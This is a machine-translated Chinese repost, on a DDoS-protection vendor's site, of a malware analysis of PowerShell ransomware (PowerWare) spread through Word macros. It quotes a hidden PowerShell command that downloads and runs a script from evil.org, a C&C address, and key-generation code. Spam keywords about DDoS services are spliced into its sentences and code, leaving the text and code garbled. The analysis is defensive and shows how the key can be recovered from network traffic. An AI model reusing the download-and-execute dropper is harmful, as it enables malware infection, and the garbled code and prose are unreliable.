DDOS防御专家-提供超强DDoS高防/CC防护/大流量清洗服务!
当前位置:主页 > 高防服务器 > 正文

高防_ddos防护是什么_无缝切换

高防_ddos防护是什么_无缝切换

恶意软件作者总是在寻找一个优势,以逃避检测和延长他们的作品的使用寿命。在恶意软件作者和安全厂商之间不断的猫捉老鼠游戏中,恶意软件作者必须不断修改和改造他们的产品。他们会想尽一切办法避免被发现。在这些方面,microsoftpowershell最近作为一种安装恶意软件和在脚本中嵌入恶意功能的方法而广受欢迎。我们将在这里查看后一个示例,DDOS防御值什么价格,其中脚本本身执行了恶意行为。感染媒介目标的典型感染路径是电子邮件–例如,第三方ddos防御,网络钓鱼电子邮件中的附件。例如,PowerShell恶意软件可以嵌入到附加的Word文档中。当用户打开Word文档附件时,将运行一个宏(实际上是一个visualbasic脚本),它加载并运行PowerShell脚本。宏在默认情况下不会正常运行,因此用户必须对文档的真实性有足够的信心,才能覆盖Windows警告并运行宏。脚本将如下所示:Shell("PowerShell")。malwareScript.ps1"",1)运行'malwareScript.ps1"在一个超级地狱里。Shell("PowerShell-ExecutionPolicy绕过-WindowStyle Hidden-noprofile(新对象System.Net.WebClient).DownloadFile('http://evil.org/f/Y.ps1','%TEMP%\我的服务.ps1');PowerShell"%TEMP%\我的服务.ps1'",代码防御ddos攻击,1)创建PowerShell"WebClient"-对象以下载"Y.ps1"并将其复制到%温度%\我的服务.ps1'.然后运行"%TEMP%\我的服务.ps1"在一个超级地狱里。PowerShell恶意软件分析图1:PowerShell勒索软件脚本如图1所示,PowerShell脚本使用无意义的变量名和base64编码进行模糊处理。这种混淆对动态行为分析没有影响,就像我们对VMRay所做的那样,但是会使逆向工程师在进行静态分析时更加困难。我们通过上传PowerShell脚本开始分析。从图2中的VMRay威胁标识符(VTI)得分可以看出,PowerShell脚本被归类为恶意脚本。VMRay还将样本发布到OPSWAT Metadefender。有趣的是,在40多个AV引擎中,只有5个在当时将文件标记为恶意(随着供应商的响应和更新签名,AV检测率通常会迅速上升)。这无疑验证了多AV扫描的价值,并凸显了完全依赖任何一家AV供应商的风险。图2:OPSWAT Metadefender的VTI得分在图3中我们可以看到很多文件都是用相同的名称创建的。这个名字特别有意思:"files\u encrypted-read"_我.html’. 这表明我们正在处理一个"PowerShell勒索软件"。图3:创建的PowerShell勒索软件(Powerware)HTML指令文件查看其中一个HTML文件就可以确认这一点(图4)。它告诉你,你的所有文件都是用RSA-2048加密加密的,你必须支付500到1000美元的解密程序。图4:PowerShell勒索软件支付说明让我们更深入地了解一下。一个典型的勒索软件联系其命令和控制(C&C)服务器来注册和管理新的受害者。这正是我们在网络行为中发现的(图5)。图5:PowerShell勒索软件C&C通信PowerShell勒索软件连接到hxxp://skycpa.in/pi.php并发送一个纯文本POST请求,其中包含来自受害者的密钥和用户id的信息。幸运的是,淘宝是怎么防御cc的,恶意软件作者忽略了加密(讽刺的是)网络流量,我们可以从网络流量转储中读取密钥(图6)。图6:网络流量转储我们可以通过重命名混淆的变量来进一步了解PowerShell勒索软件。这表明Post参数"string"和"string2"构建加密密钥。$randomKey01=([ChaR[]](GeT RandOm-Input$(48..57+65..90+97..122)-Count 50))-连接""$randomKey02=([ChaR[]](GeT RandOm-Input$(48..57+65..90+97..122)-计数20))-连接""(..join..join[-Randomic[]57+uuO97)(随机数=$65)...$postParameter="字符串=$randomKey01&string2=$randomKey02&uuid=$randomUUID"...[字节[]]$byteArrayOfRandomKey01=[system.Text.编码]::Unicode.GetBytes($randomKey01)...$byteArrayOfRandomKey02=[文本。编码]:UTF8.GetBytes($randomKey02)$RijndaelAES=新对象System.Security.加密RijndaelManaged公司$RijndaelAES.钥匙=(新对象Security.Cryptography.rfc2898派生字节$randomKey01,$byteArrayOfRandomKey02,5).GetBytes(32)喂!我们现在可以解密所有的文件,而不必为作者的解密程序支付高达1000美元的费用。结论PowerShell勒索软件一直很简单。它会加密它发现的任何具有常见文件扩展名的文件,如.doc、.wav(图7),并用一个html文件的文件"加密-读取"告诉受害者这个坏消息_我.HTML与作者在"文件加密阅读"中的建议相反_我.HTML'信息,实际使用的加密算法是Rijndael(更好地被称为AES)。AES密钥应该已经用RSA加密,以便进行密钥交换。然而,他们对加密的最基本方面都缺乏了解,导致他们犯了一个严重的错误——没有加密网络流量本身。AES密钥应该已经用RSA加密,以便进行密钥交换。这个简单的疏忽使得通过动态行为分析来发现解密密钥变得相当简单。图7:要加密的标准文件扩展名附加链接OPSWAT Metadefender结果https://blog.gdata.de/2014/07/23801-poweliks-hartnakige-malware-ohne-dateihttps://www.carbonblack.com/2016/03/25/threat-alert-powerware-new-ransomware-writed-in-powershell-targets-organizations-via-microsoft-word/https://securingtomorrow.mcafee.com/technical-how-to/malware-employees-powershell-to-infect-systems/https://www.carbonblack.com/2016/04/06/who-needs-malware-powershell-and-wmi-are-already-there/http://www.theregister.co.uk/2016/03/29/powershell_ransomware_hits_healthcare/http://www.computerworld.com/article/3048282/security/new-ransomware-rauses-windows-powershell-word-document-macros.html关于Carsten WillemsCarsten博士是CWSandbox的最初开发者,CWSandbox是第一个商业恶意软件沙箱系统之一,后来改名为GFI sandbox和Threat Analyzer。他是创建动态恶意软件分析和检测企业软件的先驱,也是这一领域全球领先的专家之一。他于2013年在波鸿鲁尔大学获得计算机科学/信息技术安全博士学位,如今在恶意软件研究和软件设计方面拥有超过20年的经验。卡斯滕创立了几家公司,指导过许多网络安全初创公司,美国高防cdn,并定期出席学术和行业会议。他与联合创始人兼CTO Ralf Hund一起开发了独特的基于虚拟机监控程序的威胁检测技术,这是VMRay Analyzer的基础。

版权保护: 本文由 DDOS防御专家 原创,转载请保留链接: /ddos/61260.html

DDoS防御专家简介孤之剑
国内资深白帽子二十人组成员,前BAT资深网络安全工程师,知名网络安全站点板块大神,每年提交Google及微软漏洞,原sina微博负载插件开发者,现在整体防御复合攻击长期接受1-4.7T攻击,CC防护自主开发指纹识别系统,可以做到99.9999%的无敌防御。
  • 文章总数
  • 8166379访问次数
  • 建站天数

    QQ客服

    400-0797-119

    X